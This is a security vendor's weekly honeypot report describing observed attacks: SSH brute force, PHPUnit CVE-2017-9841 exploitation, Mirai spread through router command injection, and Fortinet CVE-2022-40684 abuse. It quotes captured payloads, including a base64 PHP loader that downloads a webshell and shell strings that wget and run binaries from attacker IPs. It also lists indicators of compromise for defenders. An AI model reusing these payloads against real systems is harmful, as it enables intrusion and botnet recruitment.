Honeypots: activity of the week 43

During week 43, TEHTRIS chose to highlight 4 malicious activities observed on its international honeypot network.

SSH scan: targeting terraria game servers

This week, 10 IP addresses attempted to use the login “terraria” (and variants) more than 560 times on the TEHTRIS honeypot network.

IP sourceCount percentagesASCountry
194.163.148[.]727.629%AS 51167 ( Contabo GmbH )DE
139.99.9[.]14721.925%AS 16276 ( OVH SAS )SG
15.235.114[.]7913.904%AS 16276 ( OVH SAS )CA
167.86.69[.]678.378%AS 51167 ( Contabo GmbH )DE
173.212.196[.]67.487%AS 51167 ( Contabo GmbH )DE
135.125.194[.]204.635%AS 16276 ( OVH SAS )DE
194.163.149[.]1414.635%AS 51167 ( Contabo GmbH )DE
51.222.12[.]1374.635%AS 16276 ( OVH SAS )CA
194.233.80[.]384.456%AS 141995 ( Contabo Asia Private Limited )SG
137.74.0[.]2232.317%AS 16276 ( OVH SAS )PL

These 10 IP addresses tested the same 27 login / password combinations.

It is likely that these SSH scans are aimed at detecting and compromising Terraria game servers. TEHTRIS strongly recommends that you always change your default credentials to avoid exposing your servers to automatic scans.

Focus on IP 51.77.247[.]119

The French IP address 51.77.247[.]119, from AS 16276 (OVH SAS), launched a web request on 30/10/22 on a Lithuanian infrastructure including:

  • The URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, which makes it possible to exploit the CVE-2017-9841 (CVSS3: 9.8) vulnerability in PHPUnit, which allows an attacker to remotely execute code on a vulnerable site
  • The following query encoded in base 64 in the Raw Data:
<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5wbC92aWV3L3Jhdy83ZDM4N2YxZSIsIkJ1Z3oucGhwIikpIHsKCWVjaG8gIlN1a3Nlc2dibGsiOwp9IGVsc2UgewoJZWNobyAiZmFpbCI7Cn0KPz4=')); ?>

Decoded from base 64:

function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
if(adminer("https[:]//pastebin[.]pl/view/raw/7d387f1e","Bugz.php")) {
	echo "Suksesgblk";
} else {
	echo "fail";

The function the attacker seeks to execute, presumably by exploiting the CVE-2017-9841 vulnerability, aims at downloading a file from the URL https[:]//pastebin[.]pl/view/raw/7d387f1e. This URL is unfavorably known from public databases, in particular for uploading a file (sha256: 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) containing an obfuscated PHP webshell. This webshell is called FoxAutoV5 and is available on https[:]//anonymousfox[.]co.

FoxAutoV5 (sha256 : 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b)

FoxAutoV5 includes many features for exploring and searching for information on compromised machines, allowing the attacker to know its environment: where data with passwords are located, where are the vulnerabilities… It also provides bruteforce and lateral movement capabilities. This webshell is not very secure (there is no password to access it, for instance) but is encoded well enough to make some static searches ineffective and avoid detection. Its score on VirusTotal is only 2 / 61.  

Moreover, the IP 51.77.247[.]119 that caused this event appeared in malicious files exploiting the Log4j vulnerability (mentioned in week 42).

Routers’ vulnerabilities exploit to propagate Mirai botnet

User agent “Momentum”

2 IP addresses were associated with the User Agent “Momentum” and sent the following URL request:


This URL aims to exploit the vulnerability CVE-2018-10561 (CVSS3: 9.8), concerning Dasan GPON routers and allows an attacker to bypass authentication (mentioned in week 39).

If the vulnerability is active, the header indicates the server that will be contacted to download a malicious file (possibly a Mirai backdoor). Thus:

  • US IP 193.47.61[.]60 (AS 211252 DELIS LLC) is associated with the header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//185.132.53[.]105g -O-|sh&ipv=0′
  • Singaporean IP 185.132.53[.]136 (AS 202437 – Julian Achter)  is associated with the header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//45.95.55[.]214/o/g -O-|sh&ipv=0′

German IP 45.95.55[.]214 (AS 200303 – LUMASERV Systems) is known to propagate Mirai. In addition, the Momentum botnet targeting Linux systems was revealed in late 2019 and is known to distribute Mirai backdoors and enlist devices to perform DDoS attacks, among other things.

User agent “r00ts3c-owned-you”

10 IP addresses scanned for known vulnerabilities in some versions of ZyXEL, Billion (mentioned in week 39) and D-Link routers to spread the Mirai botnet.

IP sourceASCountry
111.118.40[.]97AS 7562 ( HCN Dongjak )KR
137.25.54[.]5AS 20115 ( CHARTER-20115 )US
209.93.149[.]48AS 6871 ( British Telecommunications PLC )GB
59.187.205[.]166AS 7562 ( HCN Dongjak )KR
143.159.103[.]77AS 6871 ( British Telecommunications PLC )GB
172.91.47[.]43AS 20001 ( TWC-20001-PACWEST )US
74.108.124[.]79AS 701 ( UUNET )US
75.67.32[.]138AS 7922 ( COMCAST-7922 )US
88.105.235[.]114AS 9105 ( TalkTalk )GB
92.14.135[.]177AS 9105 ( TalkTalk )GB

In rawdata, two types of commands are observed:

' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http[:]//134.195.138[.]33/.nCKx/zx.arm7+-O+arm7;chmod+777+arm7;./arm7 selfr'

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http[:]//46.19.141[.]122/zyxel;chmod 777 zyxel;sh zyxel;rm -rf arm7;#&r'

IP 134.195.138[.]33 (US – AS 35913 – DEDIPATH-LLC) and 46.19.141[.]122 (CH – AS 51852 – Private Layer INC) are known to distribute the Mirai botnet. The Swiss IP was referred to in files SHA256 f4a46b4bc24cc2a0ce33d32ee057f31c1370c52caa3c8813669069a1d7351066 and 40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161.

Attempts to exploit a Fortinet vulnerability

Following a PoC published in October 2022 by Horizon3 about the Fortinet vulnerability CVE-2022-40684 (CVSS3: 9.8) through which an attacker can log in as an admin, TEHTRIS observes that this PoC was used by attackers, using the same URL (/api/v2/cmdb/system/admin/admin), the same User Agent (“Report Runner”) and the same header (except the port was changed from 8888 to 9000) :

['forwarded: for=[]:8000;by=[]:9000;', 'connection: close', 'content-type: application/json', 'accept-encoding: gzip']

6 IP addresses (4 of which are unknown from public databases) made these requests, presumably in a multi-vulnerability scan that includes CVE-2021-26086 (CVSS3: 5.3) affecting Atlassian Jira’s server and Data Center.

IoC :

IP sourceASCountry
139.59.85[.]24AS 14061 ( DIGITALOCEAN-ASN )IN
159.65.199[.]18AS 14061 ( DIGITALOCEAN-ASN )NL
167.172.246[.]222AS 14061 ( DIGITALOCEAN-ASN )US
172.105.91[.]134AS 63949 ( Linode, LLC )DE
172.105.98[.]145AS 63949 ( Linode, LLC )CA
178.128.43[.]0AS 14061 ( DIGITALOCEAN-ASN )GB

As a reminder, attackers use automated systems to scan large portions of the internet to find vulnerabilities to exploit. Don’t leave the door open !